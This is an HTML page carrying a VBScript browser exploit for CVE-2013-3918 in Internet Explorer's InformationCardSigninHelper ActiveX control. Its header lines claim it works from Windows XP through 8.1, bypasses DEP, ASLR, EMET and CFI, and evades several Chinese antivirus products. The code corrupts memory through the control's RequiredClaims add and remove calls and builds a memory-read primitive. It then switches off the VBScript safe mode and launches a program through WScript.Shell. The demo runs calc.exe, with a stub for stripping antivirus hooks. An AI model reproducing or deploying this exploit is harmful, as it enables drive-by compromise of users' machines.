<!doctype html>
<html>
<head>
</head>
<body>

<p> cve_2013_3918 for http://xp.erangelab.com/ version.bypass baidu\jinshan\bxy...<p>
<p> exp for xp\win2k\win2003\vista\win7\win8.1.<p> 
<p> dve copy by yuange1975 in 2009, anti dep+aslr+emet+cfi.<p>  
<p> win7 del HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{19916E01-B44E-4E31-94A4-4696DF46157B}]  "Compatibility 

Flags"=dword:04000400 <p>


<SCRIPT LANGUAGE="VBScript">

function runmuma() 
 On Error Resume Next
 set WshShell = CreateObject("WScript.Shell")
 wexec=""
 set wexec=WshShell.run("calc.exe")
set file = CreateObject("Scripting.FileSystemObject")
'msgbox "ftp your file."
end function
</script>

<SCRIPT LANGUAGE="VBScript">
  On Error Resume Next
  set  obj=document.CreateElement("object")
  obj.classid="clsid:19916E01-B44E-4E31-94A4-4696DF46157B" 
  Set Req = obj.RequiredClaims
  dim  a(300)
  dim  i,j
  dim add
  dim num
  dim vbadd
  //add=&h010f00      
  num=200

  Begin()
 // msgbox j
  setnotsafemode()

function Begin()
  On Error Resume Next
  dim i
  myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
  myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
  mystr=chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw

(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)

  For i=0 to num
    a(i)= Array(0.0,0.0,myarray,0.0,9.52510864539202e-307) 
  Next  
 
  For i=num-50 to num-10
    a(i)=0
  Next  
 
  For i=0 to 11
    Req.add(CStr(i))
  Next
  
  For i=num-50 to num+99
    a(i)= Array(0.0,0.0,myarray,0.0,9.52510864539202e-307) 
  Next  

  For i=Req.length to 0 step -1
     Req.remove(CLng(i))
  Next

  For i=-1  to -1000 step  -1  
     Req.remove(CLng(i))

     For j=num+99 to  0  step -1    
       if ( a(j)(4) <1.0e-307) Then      
                  
                   Req.add("a")
                   Req.add("b")
                   a(j)(4)=mystr                   
                   Req.remove(CLng(i-18))              
                   Req.remove(CLng(i-18))
                   Req.add("c")
                   Req.add("d")
            
                   a(j)(0)=0.0 
                   a(j)(1)=1.74088534731324E-310
                   a(j)(3)=6.36598737437801E-314
   
                   Req.remove(CLng(i-18))
                   Req.remove(CLng(i-18))
                
                   add=a(j)(3)+16
       
                   i=-1000
                   exit for 
        End if       
    Next    
 Next 
                      
 For i=Req.length to 0 
     Req.add(Cstr(i))
 Next
end function

sub testaa()
end sub
function mydata()
    On Error Resume Next
    i=testaa
    i=null  
    a(j)(1)(add)=0
    a(j)(1)(add)=i
    a(j)(1)(add-8)=3
    mydata=a(j)(1)(add)
end function 

function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    vbadd=readmemo(i)  
    i=readmemo(i+8)
    i=readmemo(i+16)  
    mode=readmemo(i+&h134)   
   
    for k=0 to &h60 step 4
        mode=readmemo(i+&h120+k)                  
        if(mode=14) then
           mode=0          
  a(j)(1)(i+&h11c+k)=a(j)(1)(add-16)
  mode=0 
           mode=readmemo(i+&h120+k)
           Exit for
        end if
    next
  
    fuckhook()
    reset()
    runmuma() 
end function

function ReadMemo(mem) 
    On Error Resume Next
    a(j)(1)(add)=0   
    a(j)(1)(add)=mem+4     
    a(j)(1)(add-8)=8       
    ReadMemo=lenb(a(j)(1)(add))  
    a(j)(1)(add-8)=0             
end function

function fuckhook() 
    On Error Resume Next
    memadd=vbadd and &hffff0000
//* 摘除钩子、自由发挥 anti tx and bxy *// 
end function

function reset() 
    On Error Resume Next   
    a(j)(1)(add-8)=6.36598737437801E-314
    a(j)(4)=0   
    a(j)(3)=0     
    a(j)(2)=0          
   ' a(j)(1)=0
//* 恢复变量、修复内存管理结构，保证不崩。擂台赛版本，未做。 *//        
end function
</script>

</body>
</html>